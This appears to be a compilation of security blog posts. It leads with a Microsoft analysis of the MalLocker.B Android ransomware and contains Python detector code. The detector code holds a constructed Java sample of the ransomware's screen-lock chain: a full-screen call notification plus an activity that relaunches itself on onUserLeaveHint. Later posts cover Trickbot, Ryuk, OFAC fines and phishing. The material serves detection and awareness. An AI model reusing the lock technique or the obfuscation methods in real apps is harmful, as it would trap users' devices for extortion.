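    m = re.search(r'\b' + re.escape(name) + r'\s*\([^)]*\)\s*\{', src)
    if not m:
        return None
    depth = 1
    for i in range(m.end(), len(src)):
        if src[i] == '{':
            depth += 1
        elif src[i] == '}':
            depth -= 1
            if depth == 0:
                return src[m.end():i]
    return None


def scan_sources(sources: Dict[str, str]) -> List[Finding]:
    """Return per-class findings plus a combined 'screen-lock-chain' finding."""
    findings: List[Finding] = []
    notif_classes: List[str] = []
    hook_classes: List[str] = []
    for cls, src in sources.items():
        if CALL_CATEGORY.search(src) and FULL_SCREEN_INTENT.search(src):
            notif_classes.append(cls)
            findings.append(Finding("call-notification-with-fullscreen-intent", cls,
                                    "setCategory(CATEGORY_CALL) + setFullScreenIntent()"))
        body = method_body(src, "onUserLeaveHint")
        if body is not None:
            hit = RELAUNCH.search(body)
            if hit:
                hook_classes.append(cls)
                findings.append(Finding("onUserLeaveHint-relaunch", cls,
                                        f"onUserLeaveHint() body calls {hit.group(0)}...)"))
    if notif_classes and hook_classes:
        findings.append(Finding("screen-lock-chain", "*",
                                f"notification in {notif_classes}, hook in {hook_classes}"))
    return findings


def rules_hit(sources: Dict[str, str]) -> set:
    return {f.rule for f in scan_sources(sources)}


# Constructed sample: the chain described in the analysis (not the real malware code).
SUSPICIOUS_APP = {
    "com.example.lock.RansomActivity": """
public class RansomActivity extends Activity {
    @Override
    protected void onUserLeaveHint() {
        super.onUserLeaveHint();
        Intent i = new Intent(this, RansomActivity.class);
        startActivity(i);
    }
}
""",
    "com.example.lock.Notifier": """
public class Notifier {
    void post(Context ctx, PendingIntent pi) {
        NotificationCompat.Builder b = new NotificationCompat.Builder(ctx, "ch");
        b.setCategory(NotificationCompat.CATEGORY_CALL);
        b.setFullScreenIntent(pi, true);
        NotificationManagerCompat.from(ctx).notify(1, b.build());
    }
}
""",
}

# Constructed sample: a dialer that uses the same notification but no relaunch hook.
BENIGN_DIALER = {
    "com.example.dialer.InCallActivity": """
public class InCallActivity extends Activity {
    @Override
    protected void onUserLeaveHint() {
        super.onUserLeaveHint();
        Log.d("call", "user left the in-call screen");
    }
}
""",
    "com.example.dialer.Notifier": SUSPICIOUS_APP["com.example.lock.Notifier"],
}

if __name__ == "__main__":
    for name, app in (("suspicious", SUSPICIOUS_APP), ("dialer", BENIGN_DIALER)):
        print(name, sorted(rules_hit(app)))
```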

Machine learning module indicates continuous evolution

As mentioned, this ransomware is the latest variant of a malware family that has undergone several stages of evolution. The knowledge graph below shows the various techniques this ransomware family has been seen using, including abusing the system alert window, abusing accessibility features, and, more recently, abusing notification services.

Figure 4. Knowledge graph of techniques used by the ransomware family

This ransomware family’s long history tells us that its evolution is far from over. We expect it to churn out new variants with even more sophisticated techniques. In fact, recent variants contain code forked from an open-source machine learning module used by developers to automatically resize and crop images based on screen size, a valuable function given the variety of Android devices.

The frozen TinyML model is useful for making sure images fit the screen without distortion. In the case of this ransomware, using the model would ensure that its ransom note, typically a fake police notice or explicit images supposedly found on the device, appears less contrived and more believable, increasing the chances of the user paying the ransom.

The library that uses TinyML is not yet wired to the malware’s functionality, but its presence in the malware code indicates the intention to do so in future variants. We will continue to monitor this ransomware family to ensure customers are protected and to share our findings and insights with the community for broad protection against these evolving mobile threats.

Protecting organizations from threats across domains and platforms

Mobile threats continue to rapidly evolve, with attackers continuously attempting to sidestep technological barriers and creatively find ways to accomplish their goal, whether financial gain or finding an entry point to broader network compromise.

This new mobile ransomware variant is an important discovery because the malware exhibits behaviors that have not been seen before and could open doors for other malware to follow. It reinforces the need for comprehensive defense powered by broad visibility into attack surfaces as well as domain experts who track the threat landscape and uncover notable threats that might be hiding amidst massive threat data and signals.

Microsoft Defender for Endpoint on Android, now generally available, extends Microsoft’s industry-leading endpoint protection to Android. It detects this ransomware (AndroidOS/MalLocker.B), as well as other malicious apps and files using cloud-based protection powered by deep learning and heuristics, in addition to content-based detection. It also protects users and organizations from other mobile threats, such as mobile phishing, unsafe network connections, and unauthorized access to sensitive data. Learn more about our mobile threat defense capabilities in Microsoft Defender for Endpoint on Android.

Malware, phishing, and other threats detected by Microsoft Defender for Endpoint are reported to the Microsoft Defender Security Center, allowing SecOps to investigate mobile threats along with endpoint signals from Windows and other platforms using Microsoft Defender for Endpoint’s rich set of tools for detection, investigation, and response.

Threat data from endpoints is combined with signals from email and data, identities, and apps in Microsoft 365 Defender (previously Microsoft Threat Protection), which orchestrates detection, prevention, investigation, and response across domains, providing coordinated defense. Microsoft Defender for Endpoint on Android further enriches organizations’ visibility into malicious activity, empowering them to comprehensively prevent, detect, and respond to attack sprawl and cross-domain incidents.

Technical analysis

Obfuscation

On top of recreating ransomware behavior in ways we haven’t seen before, the Android malware variant uses a new obfuscation technique unique to the Android platform. One of the tell-tale signs of obfuscated malware is the absence of code that defines the classes declared in the manifest file.

Figure 5. Manifest file

The classes.dex has implementations for only two classes:

  1. The main application class gCHotRrgEruDv, which is invoked when the application opens
  2. A helper class that has the definition for custom encryption and decryption

This means that there’s no code corresponding to the components declared in the manifest file: Main Activity, Broadcast Receivers, and Background. How does the malware work without code for these key components? As is characteristic for obfuscated threats, the malware has encrypted binary code stored in the Assets folder:

Figure 6. Encrypted executable code in Assets folder
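The manifest/dex mismatch just described is cheap to check automatically. The following is an added example, not Microsoft’s or the malware’s code: it parses an AndroidManifest.xml, resolves each declared component class the way Android does (“.Foo” and “Foo” are relative to the package), and reports the components that have no definition among the classes listed in the dex. The manifest, package name and dex class list are constructed for the demo.

```python
"""Packed-dropper indicator: manifest components with no code in classes.dex.

Constructed example. A manifest whose application class is present in the dex
while its activities, services and receivers are absent is the pattern described
above; looks_packed() reports exactly that combination.
"""
import xml.etree.ElementTree as ET
from typing import Dict, Iterable, Set

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = {"application", "activity", "service", "receiver", "provider"}


def resolve_class(package: str, name: str) -> str:
    """Expand manifest shorthand: '.Foo' -> 'pkg.Foo', 'Foo' -> 'pkg.Foo', 'a.b.Foo' unchanged."""
    if name.startswith("."):
        return package + name
    if "." not in name:
        return package + "." + name
    return name


def dex_class_name(descriptor: str) -> str:
    """Convert a dex descriptor such as 'Lcom/x/Foo;' to 'com.x.Foo' (dotted names pass through)."""
    if descriptor.startswith("L") and descriptor.endswith(";"):
        return descriptor[1:-1].replace("/", ".")
    return descriptor


def declared_components(manifest_xml: str) -> Dict[str, str]:
    """Map each component class declared in the manifest to its tag name."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    out: Dict[str, str] = {}
    for el in root.iter():
        if el.tag in COMPONENT_TAGS:
            name = el.get(ANDROID_NS + "name")
            if name:
                out[resolve_class(package, name)] = el.tag
    return out


def missing_components(manifest_xml: str, dex_classes: Iterable[str]) -> Dict[str, str]:
    """Declared components (class -> tag) that have no class definition in the dex."""
    present: Set[str] = {dex_class_name(c) for c in dex_classes}
    return {cls: tag for cls, tag in declared_components(manifest_xml).items()
            if cls not in present}


def looks_packed(manifest_xml: str, dex_classes: Iterable[str]) -> bool:
    """True when the application class exists but every other component is undefined."""
    dex_classes = list(dex_classes)
    declared = declared_components(manifest_xml)
    missing = missing_components(manifest_xml, dex_classes)
    app_present = any(tag == "application" and cls not in missing
                      for cls, tag in declared.items())
    others = [cls for cls, tag in declared.items() if tag != "application"]
    return app_present and bool(others) and all(cls in missing for cls in others)


# Constructed manifest and dex class lists (not taken from the real sample).
DROPPER_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.dropper">
  <application android:name="MainApp">
    <activity android:name=".MainActivity"/>
    <service android:name=".BackgroundService"/>
    <receiver android:name=".BootReceiver"/>
  </application>
</manifest>
"""
# Only the application class and a crypto helper are defined, as in the analysis.
DROPPER_DEX = ["Lcom/example/dropper/MainApp;", "Lcom/example/dropper/CryptoHelper;"]
# A normally built app defines every declared component.
CLEAN_DEX = DROPPER_DEX + ["Lcom/example/dropper/MainActivity;",
                           "Lcom/example/dropper/BackgroundService;",
                           "Lcom/example/dropper/BootReceiver;"]

if __name__ == "__main__":
    for cls, tag in missing_components(DROPPER_MANIFEST, DROPPER_DEX).items():
        print(f"{tag} {cls}: declared but not defined in classes.dex")
    print("packed dropper?", looks_packed(DROPPER_MANIFEST, DROPPER_DEX))
```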

When the malware runs for the first time, the static block of the main class is run. The code is heavily obfuscated and made unreadable through name mangling and use of meaningless variable names:

Figure 7. Static block

Decryption with a twist

The malware uses an interesting decryption routine: the string values passed to the decryption function do not correspond to the decrypted value; they are junk intended simply to hinder analysis.

On Android, an Intent is a software mechanism that allows an app to coordinate the functions of different Activities to achieve a task. It’s a messaging object that can be used to request an action from another app component.

The Intent object carries a string value as its “action” parameter. The malware creates an Intent inside the decryption function using the string value passed in as the name for the Intent. It then decrypts a hardcoded encrypted value and sets the “action” parameter of the Intent using the setAction API. Once this Intent object is generated with the action value pointing to the decrypted content, the decryption function returns the Intent object to the caller. The caller then invokes the getAction method to get the decrypted content.

Figure 8. Decryption function using the Intent object to pass the decrypted value

Payload deployment

Once the static block execution is complete, the Android lifecycle callback transfers control to the onCreate method of the main class.

Figure 9. onCreate method of the main class decrypting the payload

Next, the malware-defined function decryptAssetToDex (a meaningful name we assigned during analysis) receives the string “CuffGmrQRT” as the first argument, which is the name of the encrypted file stored in the Assets folder.

Figure 10. Decrypting the assets

After being decrypted, the asset becomes a .dex file. This is a notable behavior that is characteristic of this ransomware family.

Figure 11. Asset file before and after decryption

Once the encrypted executable is decrypted and dropped to storage, the malware has the definitions for all the components it declared in the manifest file. It then starts the final detonator function to load the dropped .dex file into memory and trigger the main payload.

Figure 12. Loading the decrypted .dex file into memory and triggering the main payload

Main payload

When the main payload is loaded into memory, the initial detonator hands over the control to the main payload by invoking the method XoqF (which we renamed to triggerInfection during analysis) from the gvmthHtyN class (renamed to PayloadEntry).

Figure 13. Handover from initial module to the main payload

As mentioned, the initial handover component called triggerInfection with an instance of appObj and a method that returns the value for the variable config.

Figure 14. Definition of populateConfigMap, which loads the map with values

Correlating the last two steps, one can observe that the malware payload receives the configuration for the following properties:

  1. number – The default number to be sent to the server (in case the number is not available from the device)
  2. api – The API key
  3. url – The URL to be loaded in a WebView to display the ransom note

The malware saves this configuration to the shared preferences of the app data and then it sets up all the Broadcast Receivers. This action registers code components to get notified when certain system events happen. This is done in the function initComponents.

Figure 15. Initializing the BroadcastReceiver against system events

From this point on, the malware execution is driven by callback functions that are triggered on system events like connectivity change, unlocking the phone, elapsed time interval, and others.


Dinesh Venkatesan

Microsoft Defender Research


The post Sophisticated new Android malware marks the latest evolution of mobile ransomware appeared first on Microsoft Security.

30 Ransomware Prevention Tips

Dealing with the aftermath of ransomware attacks is like Russian roulette. Submitting the ransom might seem like it’s the sole option for recovering locked data. But paying the ransom doesn’t mean that your organization will get its affected data back. Let’s not forget that ransomware also continues to evolve as a threat category. Beginning in […]… Read More

The post 30 Ransomware Prevention Tips appeared first on The State of Security.

Attacks Aimed at Disrupting the Trickbot Botnet

Over the past 10 days, someone has been launching a series of coordinated attacks designed to disrupt Trickbot, an enormous collection of more than two million malware-infected Windows PCs that are constantly being harvested for financial data and are often used as the entry point for deploying ransomware within compromised organizations.

A text snippet from one of the bogus Trickbot configuration updates. Source: Intel 471

On Sept. 22, someone pushed out a new configuration file to Windows computers currently infected with Trickbot. The crooks running the Trickbot botnet typically use these config files to pass new instructions to their fleet of infected PCs, such as the Internet address where hacked systems should download new updates to the malware.

But the new configuration file pushed on Sept. 22 told all systems infected with Trickbot that their new malware control server had the address 127.0.0.1, which is a “localhost” address that is not reachable over the public Internet, according to an analysis by cyber intelligence firm Intel 471.

It’s not known how many Trickbot-infected systems received the phony update, but it seems clear this wasn’t just a mistake by Trickbot’s overlords. Intel 471 found that it happened yet again on Oct. 1, suggesting someone with access to the inner workings of the botnet was trying to disrupt its operations.

“Shortly after the bogus configs were pushed out, all Trickbot controllers stopped responding correctly to bot requests,” Intel 471 wrote in a note to its customers. “This possibly means central Trickbot controller infrastructure was disrupted. The close timing of both events suggested an intentional disruption of Trickbot botnet operations.”

Intel 471 CEO Mark Arena said it’s anyone’s guess at this point who is responsible.

“Obviously, someone is trying to attack Trickbot,” Arena said. “It could be someone in the security research community, a government, a disgruntled insider, or a rival cybercrime group. We just don’t know at this point.”

Arena said it’s unclear how successful these bogus configuration file updates will be given that the Trickbot authors built a fail-safe recovery system into their malware. Specifically, Trickbot has a backup control mechanism: A domain name registered on EmerDNS, a decentralized domain name system.

“This domain should still be in control of the Trickbot operators and could potentially be used to recover bots,” Intel 471 wrote.

But whoever is screwing with the Trickbot purveyors appears to have adopted a multi-pronged approach: Around the same time as the second bogus configuration file update was pushed on Oct. 1, someone stuffed the control networks that the Trickbot operators use to keep track of data on infected systems with millions of new records.

Alex Holden is chief technology officer and founder of Hold Security, a Milwaukee-based cyber intelligence firm that helps recover stolen data. Holden said at the end of September Trickbot held passwords and financial data stolen from more than 2.7 million Windows PCs.

By October 1, Holden said, that number had magically grown to more than seven million.

“Someone is flooding the Trickbot system with fake data,” Holden said. “Whoever is doing this is generating records that include machine names indicating these are infected systems in a broad range of organizations, including the Department of Defense, U.S. Bank, JP Morgan Chase, PNC and Citigroup, to name a few.”

Holden said the flood of new, apparently bogus, records appears to be an attempt by someone to dilute the Trickbot database and confuse or stymie the Trickbot operators. But so far, Holden said, the impact has been mainly to annoy and aggravate the criminals in charge of Trickbot.

“Our monitoring found at least one statement from one of the ransomware groups that relies on Trickbot saying this pisses them off, and they’re going to double the ransom they’re asking for from a victim,” Holden said. “We haven’t been able to confirm whether they actually followed through with that, but these attacks are definitely interfering with their business.”

Intel 471’s Arena said this could be part of an ongoing campaign to dismantle or wrest control over the Trickbot botnet. Such an effort would hardly be unprecedented. In 2014, for example, U.S. and international law enforcement agencies teamed up with multiple security firms and private researchers to commandeer the Gameover Zeus Botnet, a particularly aggressive and sophisticated malware strain that had enslaved up to 1 million Windows PCs globally.

Trickbot would be an attractive target for such a takeover effort because it is widely viewed as a platform used to find potential ransomware victims. Intel 471 describes Trickbot as “a malware-as-a-service platform that caters to a relatively small number of top-tier cybercriminals.”

One of the top ransomware gangs in operation today, which deploys ransomware strains known variously as “Ryuk” and “Conti,” is known to be closely associated with Trickbot infections. Both ransomware families have been used in some of the most damaging and costly malware incidents to date.

The latest Ryuk victim is Universal Health Services (UHS), a Fortune 500 hospital and healthcare services provider that operates more than 400 facilities in the U.S. and U.K.

On Sunday, Sept. 27, UHS shut down its computer systems at healthcare facilities across the United States in a bid to stop the spread of the malware. The disruption has reportedly caused the affected hospitals to redirect ambulances and relocate patients in need of surgery to other nearby hospitals.

Cyber News Rundown: Ryuk Wreaks Healthcare Havoc

Reading Time: ~ 2 min.

Ryuk Shuts Down Universal Health Services

Computer systems for all 400 Universal Health Services facilities around the globe have reportedly been shut down following an attack by the Ryuk ransomware group. Ryuk is known for targeting large organizations, but the healthcare industry has been gaining popularity among these groups due to high volumes of sensitive information and typically low levels of security. It’s unknown if the healthcare firm has paid ransoms for the encrypted data or if they are restoring systems from available backups.

Global Insurance Firm Targeted by Ransomware

The Fortune 500 insurance firm AJG was forced to take several computer systems offline over the weekend after identifying a cyber-attack. It’s still unclear which ransomware variant was responsible for the attack and officials with the firm haven’t revealed if customer or employee information was stolen. Third-party researchers confirmed multiple AJG servers, unpatched for a serious vulnerability, could have been the entry point for the attack.

French Shipping Company Knocked Offline by Ransomware

All computer systems and websites belonging to CMA CGM, a French shipping giant, were knocked offline by a crippling ransomware attack. This makes CMA CGM the fourth international shipping company in as many years to fall victim to a cyberattack, attacks that have proven profitable for the criminals. The company has verified that the Ragnar Locker ransomware group was behind the attack, though it has not revealed the ransom asked.

Cyber Attack Forces Swatch to Disconnect Online Services

Though not confirmed by Swatch, the Swiss watchmaker was reportedly forced to take many of their systems offline after likely falling victim to a ransomware attack. While the company did not verify the type of attack, ransomware’s prevalence this year makes it a likely culprit. Swatch has announced they plan to seek legal action against the attackers.

DDoS Attacks See Substantial Rise in 2020

There were over 4.8 million DDoS attacks during the first half of 2020, a 15% rise over the same period last year. May alone saw more than 900,000 DDoS attacks, a record for most in a single month. Ninety percent of these attacks lasted for under an hour, marking another shift from previous years’ attacks. They have also increased in complexity, leaving victims and researchers with little time to defend themselves.

The post Cyber News Rundown: Ryuk Wreaks Healthcare Havoc appeared first on Webroot Blog.

Cyber Security Roundup for October 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, October 2020.

COVID-19 wasn't the only virus seriously disrupting the start of the new UK academic year, with ransomware plaguing a number of universities and colleges in September. Newcastle University was reportedly hit by the 'DoppelPaymer' crime group, a group known for deploying malware to attack their victims, and behind leaking online documents from Elon Musk's SpaceX and Tesla companies. The northeast university reported a personal data breach to the UK Information Commissioner's Office after its stolen files were posted online, along with a Twitter threat to release further confidential student and staff data if a ransom payment was not paid. In a statement, the university said "it will take several weeks" to address the issues, and that "many IT services will not be operating during this period"; that statement is the hallmark of recovery from a mass ransomware infection.

Doppelpaymer Ransom notice

On the back of the Newcastle University cyberattack, the UK National Cyber Security Centre (NCSC) issued a warning to all British universities and colleges about a spike in ransomware attacks targeting the British educational sector. NCSC's director of operations Paul Chichester said the agency had seen an increase in the "utterly reprehensible" attacks over the past 18 months and was concerned they would disrupt young people's education.  The NCSC's guidance for organisations on defending against ransomware attacks is available here.

Across the pond, healthcare giant Universal Health Services (UHS), which operates nearly 400 hospitals and clinics, was said to be severely disrupted by the Ryuk ransomware. According to Bleeping Computer, a UHS employee said encrypted files had the telltale .ryk extension, while another employee described a ransom note that fitted the Ryuk ransomware demand note. A Reddit thread claimed “All UHS hospitals nationwide in the US currently have no access to phones, computer systems, internet, or the data center. Ambulances are being rerouted to other hospitals, the information needed to treat patients – health records, lab works, cardiology reports, medications records, etc. – is either temporarily unavailable or received with delay, affecting patient treatment. Four people died tonight alone due to the waiting on results from the lab to see what was going on”. In response, UHS released a statement which said, “We implement extensive IT security protocols and are working diligently with our IT security partners to restore IT operations as quickly as possible. In the meantime, our facilities are using their established back-up processes including offline documentation methods".

'Dark Overlord', the handle of a British hacker involved in the theft of information as part of "The Overlord" hacking group, was jailed for five years in the United States and ordered to pay $1.5 million in restitution, after pleading guilty to conspiring to commit aggravated identity theft and computer fraud, in other words, orchestrating cyber extortion attacks against US firms.


ZeroLogon:  IT Support Staff must Patch Now!
A critical Microsoft Windows Server Domain Controller vulnerability (CVE-2020-1472) is now causing concern for IT staff, after Microsoft, CISA, the UK NCSC, and other security bodies warned in mid-September that the vulnerability was being actively exploited. Dubbed 'Zerologon', the bug scored the maximum criticality rating of 10.0; Microsoft issued a security fix for it as part of its August 2020 'Patch Tuesday' release of monthly security updates. Since the public disclosure of the flaw, multiple proof-of-concept (PoC) exploits have appeared on the internet, which threat actors are now adapting into their cyberattacks. There are no mitigations or workarounds for this vulnerability, so it is essential that the CVE-2020-1472 security update is installed on all Microsoft Windows Domain Controllers, and then that DC enforcement mode is enabled.

Stay safe and secure.


        Ransomware Victims That Pay Up Could Incur Steep Fines from Uncle Sam

        Companies victimized by ransomware and firms that facilitate negotiations with ransomware extortionists could face steep fines from the U.S. federal government if the crooks who profit from the attack are already under economic sanctions, the Treasury Department warned today.

        Image: Shutterstock

        In its advisory (PDF), the Treasury’s Office of Foreign Assets Control (OFAC) said “companies that facilitate ransomware payments to cyber actors on behalf of victims, including financial institutions, cyber insurance firms, and companies involved in digital forensics and incident response, not only encourage future ransomware payment demands but also may risk violating OFAC regulations.”

        As financial losses from cybercrime activity and ransomware attacks in particular have skyrocketed in recent years, the Treasury Department has imposed economic sanctions on several cybercriminals and cybercrime groups, effectively freezing all property and interests of these persons (subject to U.S. jurisdiction) and making it a crime to transact with them.

        A number of those sanctioned have been closely tied with ransomware and malware attacks, including the North Korean Lazarus Group; two Iranians thought to be tied to the SamSam ransomware attacks; Evgeniy Bogachev, the developer of Cryptolocker; and Evil Corp, a Russian cybercriminal syndicate that has used malware to extract more than $100 million from victim businesses.

        Those that run afoul of OFAC sanctions without a special dispensation or “license” from Treasury can face several legal repercussions, including fines of up to $20 million.

        The Federal Bureau of Investigation (FBI) and other law enforcement agencies have tried to discourage businesses hit by ransomware from paying their extortionists, noting that doing so only helps bankroll further attacks.

        But in practice, a fair number of victims find paying up is the fastest way to resume business as usual. In addition, insurance providers often help facilitate the payments because the amount demanded ends up being less than what the insurer might have to pay to cover the cost of the affected business being sidelined for days or weeks at a time.

        While it may seem unlikely that companies victimized by ransomware might somehow be able to know whether their extortionists are currently being sanctioned by the U.S. government, they still can be fined either way, said Ginger Faulk, a partner in the Washington, D.C. office of the law firm Eversheds Sutherland.

        Faulk said OFAC may impose civil penalties for sanctions violations based on “strict liability,” meaning that a person subject to U.S. jurisdiction may be held civilly liable even if it did not know or have reason to know it was engaging in a transaction with a person that is prohibited under sanctions laws and regulations administered by OFAC.

        “In other words, in order to be held liable as a civil (administrative) matter (as opposed to criminal), no mens rea or even ‘reason to know’ that the person is sanctioned is necessary under OFAC regulations,” Faulk said.

        But Fabian Wosar, chief technology officer at computer security firm Emsisoft, said Treasury’s policies here are nothing new, and that they mainly constitute a warning for individual victim firms who may not already be working with law enforcement and/or third-party security firms.

        Wosar said companies that help ransomware victims negotiate lower payments and facilitate the financial exchange are already aware of the legal risks from OFAC violations, and will generally refuse clients who get hit by certain ransomware strains.

        “In my experience, OFAC and cyber insurance with their contracted negotiators are in constant communication,” he said. “There are often even clearing processes in place to ascertain the risk of certain payments violating OFAC.”

        Along those lines, OFAC said the degree of a person/company’s awareness of the conduct at issue is a factor the agency may consider in assessing civil penalties. OFAC said it would consider “a company’s self-initiated, timely, and complete report of a ransomware attack to law enforcement to be a significant mitigating factor in determining an appropriate enforcement outcome if the situation is later determined to have a sanctions nexus.”

        Ransom from Home – How to close the cyber front door to remote working ransomware attacks

        Coronavirus has caused a major shift to our working patterns. In many cases these will long outlast the pandemic. But working from home has its own risks. One is that you may invite ransomware attacks from a new breed of cyber-criminal who has previously confined his efforts to directly targeting the corporate network. Why? Because as a remote worker, you’re increasingly viewed as a soft target—the open doorway to extorting money from your employer.

        So how does ransomware land up on your front doorstep? And what can a home worker do to shut that door?

        The new ransomware trends

        Last year, Trend Micro detected over 61 million ransomware-related threats, a 10% increase from 2018 figures. But things have only gotten worse from there. There has been a 20% spike in ransomware detections globally in the first half of 2020, rising to 109% in the US. And why is that?

        At a basic level, ransomware searches for and encrypts most of the files on a targeted computer, so as to make them unusable. Victims are then asked to pay a ransom within a set time frame in order to receive the decryption key they need to unlock their data. If they don’t, and they haven’t backed-up this data, it could be lost forever.

        The trend of late, however, has been to focus on public and private sector organizations whose staff are working from home (WFH). The rationale is that remote workers are less likely to be able to defend themselves from ransomware attacks, while they also provide a useful stepping-stone into high-value corporate networks. Moreover, cybercriminals are increasingly looking to steal sensitive data before they encrypt it, and they are likely to fetch a higher ransom from an organization than from a typical consumer, especially if the remote employee’s data is covered by cyber-insurance.

        Home workers are also increasingly targeted for a number of reasons:

        • They may be more distracted than those in the office.
        • Home network and endpoint security may not be up to company levels.
        • Home systems (routers, smart home devices, PCs, etc.) may not be up-to-date and therefore are more easily exposed to exploits.
        • Remote workers are more likely to visit insecure sites, download risky apps, or share machines/networks with those who do.
        • Corporate IT security teams may be overwhelmed with other tasks and unable to provide prompt support to a remote worker.
        • Security awareness programs may have been lacking in the past, perpetuating bad practice for workers at home.

        What’s the attack profile of the remote working threat?

        In short, the bad guys are now looking to gain entry to the corporate network you may be accessing from home via a VPN, or to the cloud-hosted systems you use for work or sharing files, in order to first steal and then encrypt company data with ransomware as far and wide as possible into your organization. But the methods are familiar. They’ll

        • Try to trick you into dangerous behavior through email phishing—the usual strategy of getting you to click links that redirect you to bad websites that house malware, or getting you to download a bad file, to start the infection process.
        • Steal or guess your log-ins to work email accounts, remote desktop tools (e.g., Microsoft Remote Desktop or RDP), and cloud-based storage/networks, etc., before they deliver the full ransomware payload. This may happen via a phishing email spoofed to appear as if sent from a legitimate source, or they may scan for your use of specific tools and then try to guess the password (known as brute forcing). One new Mac ransomware, called EvilQuest, has a keylogger built into it, which could capture your company passwords as you type them in. It’s a one-two punch: steal the data first, then encrypt it.
        • Target malware at your VPN or remote desktop software, if it’s vulnerable. Phishing is again a popular way to do this, or they may hide it in software on torrent sites or in app stores. This gives them a foothold into your employer’s systems and network.
        • Target smart home devices/routers via vulnerabilities or their easy-to-guess/crack passwords, in order to use home networks as a stepping-stone into your corporate network.

        How can I prevent ransomware when working from home?

        The good news is that you, the remote worker, can take some relatively straightforward steps up front to help mitigate the cascading risks to your company posed by the new ransomware. Try the following:

        • Be cautious of phishing emails. Take advantage of company training and awareness courses if offered.
        • Keep your home router firmware, PCs, Macs, mobile devices, software, browsers and operating systems up to date on the latest versions – including remote access tools and VPNs (your IT department may do some of this remotely).
• Ensure your home network, PCs, and mobile devices are protected with up-to-date network and endpoint security software from a reputable vendor. (The solution should include anti-intrusion, anti-web threat, anti-spam, anti-phishing, and of course, anti-ransomware features.)
• Ensure remote access tools and user accounts are protected with multi-factor authentication (MFA) wherever it is offered, and disable remote (internet-side) administration on your home router.
• Disable Microsoft Office macros where possible. Malicious macros in email attachments are a typical attack vector.
• Back up important files regularly, following the 3-2-1 rule: three copies, on two different media, with one copy kept offline or off-site so that ransomware on your PC cannot reach it.

        How Trend Micro can help

        In short, to close the cyber front door to ransomware, you need to protect your home network and all your endpoints (laptops, PCs, mobile devices) to be safe. Trend Micro can help via

        • The Home Network: Home Network Security (HNS) connects to your router to protect any devices connected to the home network — including IoT gadgets, smartphones and laptops — from ransomware and other threats.
        • Desktop endpoints: Trend Micro Security (TMS) offers advanced protection from ransomware-related threats. It includes Folder Shield to safeguard valuable files from ransomware encryption, which may be stored locally or synched to cloud services like Dropbox®, Google Drive® and Microsoft® OneDrive/OneDrive for Business.
        • Mobile endpoints: Trend Micro Mobile Security (also included in TMS) protects Android and iOS devices from ransomware.
        • Secure passwords: Trend Micro Password Manager enables users to securely store and recall strong, unique passwords for all their apps, websites and online accounts, across multiple devices.
        • VPN Protection at home and on-the-go: Trend Micro’s VPN Proxy One (Mac | iOS) solution will help ensure your data privacy on Apple devices when working from home, while its cross-platform WiFi Protection solution will do the same across PCs, Macs, Android and iOS devices when working from home or when connecting to public/unsecured WiFi hotspots, as you venture out and about as the coronavirus lockdown eases in your area.

        With these tools, you, the remote worker, can help shut the front door to ransomware, protecting your work, devices, and company from data theft and encryption for ransom.

        The post Ransom from Home – How to close the cyber front door to remote working ransomware attacks appeared first on .

        Phishing attacks: 6 reasons why we keep taking the bait

        Phishing scams are among the most common and dangerous type of attack that organisations face.

        Indeed, Verizon’s Data Breach Digest found that 90% of all data breaches involve phishing.

        But what makes these attacks so successful? An Osterman Research report suggests there are six causes of phishing.


        1. Users are the weakest link

        Even if most of us think we would be able to spot a phishing scam when we receive one, it only takes a momentary lapse in judgement for us to fall victim.

The panic one experiences on receiving a message claiming, for example, that there has been suspicious activity on one’s account will in many cases cause people to overlook signs that the message is malicious.

        But by that point it’s too late, with the victim already clicking links, opening attachments and handing over their username and password.

The good news is that this is a weakness that organisations and individuals have the power to address. All they have to do is learn about the way phishing works and the clues to look out for.

        Unfortunately, most users don’t receive the necessary training. Indeed, researchers have found that 52% of users receive training no more than twice per year, and 6% of users have never received security awareness training.

        The result? IT departments are not at all confident in their users’ ability to recognise incoming threats, or in their organisation’s ability to stop phishing campaigns and related attacks.


        2. Organisations aren’t doing enough

        Staff awareness training isn’t the only step that organisations can take to better protect themselves from phishing scams.

        The report highlights three key areas of weakness:

        • Insufficient backup processes

        In the event of a ransomware attack, most organisations have insufficient backup processes. This leaves them unable to quickly restore content on servers, user workstations and other endpoints to a healthy state.

        • Lack of user testing

        Most organisations do not have adequate procedures in place to test their users, leaving them unable to determine which staff members are the most susceptible to an attack.

        Conducting a simulated phishing attack can help you establish whether your employees are vulnerable to phishing emails, enabling you to take immediate remedial action to improve your cyber security posture.

        • BYOD security risks

Many organisations lack a BYOD (Bring Your Own Device) policy, meaning that, should a cyber criminal compromise an employee’s device, they will be able not only to access the sensitive data on that device but also to leverage that access to move across the corporate network.


        3. Criminal organisations are well funded

        The massive success that cyber criminals have had in recent years means they have plenty of funds to invest in scams.

As such, they can invest in technical resources to make their scams run more efficiently – whether that’s in the number of scams they can send, the authenticity of their bogus messages or the complexity of their campaigns.

It’s also enabled cyber criminals to branch out into new attack vectors. For example, there has been a significant increase in social media phishing in recent years.

        This is particularly dangerous, because most advice about phishing relates to email-based scams – or, occasionally, to phone scams (‘vishing’). People are therefore less likely to spot the techniques that fraudsters use on social media.


        4. Cyber criminals are shifting their focus

        The availability of stolen data on the dark web has decreased its commercial value.

        Scammers can now buy payment card data on the dark web for as little as $9 (about £6.80), so there’s less profit to be had for those stealing and selling this information.

        In response, cyber criminals have changed tactics, looking to make money through organisations directly thanks to ransomware attacks.

        These types of attack are no more complicated for a cyber criminal to pull off, but the rewards can be much greater.

        Although experts warn organisations not to pay ransoms, it’s certainly tempting to wire transfer a lump sum in the hopes that you’ll get your systems back online rather than face the headaches that come with incident response.


        5. Phishing tools are low-cost and widespread

        There are an increasing number of tools that are designed to help amateurs with little IT knowledge get into the cyber crime industry.

        The availability of phishing kits and the rise of ransomware-as-a-service has resulted in an explosion of ransomware and other exploits coming from an ever growing network of amateur cyber criminals.


        6. Malware is becoming more sophisticated

        Over time, phishing and various types of malware have become more sophisticated.

        The problems of phishing, spear-phishing, CEO fraud, business email compromise and ransomware are simply going to get worse without appropriate solutions and processes to defend against them.


        Protect your organisation against phishing

        Educated and informed employees are your first line of defence. Empower them to make better security decisions with our complete staff awareness e-learning suite.

